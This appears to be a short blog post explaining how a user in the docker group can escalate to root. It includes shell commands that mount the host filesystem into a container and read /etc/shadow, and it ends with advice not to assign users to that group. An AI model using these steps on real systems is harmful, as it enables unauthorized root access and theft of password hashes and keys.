I don’t think Docker needs an introduction at this point, but in case you are unfamiliar with it; it is a way of isolating software packages by virtualizing them on an OS-level which runs in “containers.” It works in a similar way to traditional virtual machines, but with much less overhead as the kernel is shared between multiple containers.
The problem arises when the docker group is assigned to the host user. Since docker is running as root with SGID, an unauthorized person who has access to the host user (with user privileges) can easily escalate privileges by mounting the host volume to one of the containers; granting the attacker full access to the filesystem.
First, make sure the host user is part of the docker group:
alice@jada:~$ groups alice cdrom floppy audio dip video plugdev netdev bluetooth docker
docker container ps to get a quick list of the containers:
alice@jada:~$ docker container ps CONTAINER ID IMAGE COMMAND NAMES f00ba96171c5 container1 "docker-php-entrypoi…" container1 ce2ecb56a96e container2 "/etc/bind/entrypoin…" container2 620b296204a3 container3 "/usr/sbin/sshd -D" container3
From here you can spawn a tty for each container:
alice@jada:~$ docker run -ti container1 bash root@f00ba96171c5:/#
Even better, you can specify
-v to mount the entire filesystem of the host to one of the containers before accessing it. It doesn’t matter which one.
alice@jada:~$ docker run -v /:/mnt/pwned -ti container2 root@ce2ecb56a96e:/# cat /mnt/pwned/etc/shadow
You now have full access to the host volume, and from here it’s just a matter of grabbing keys, hashes, and whatnot to get a shell.
Don’t assign users to docker groups.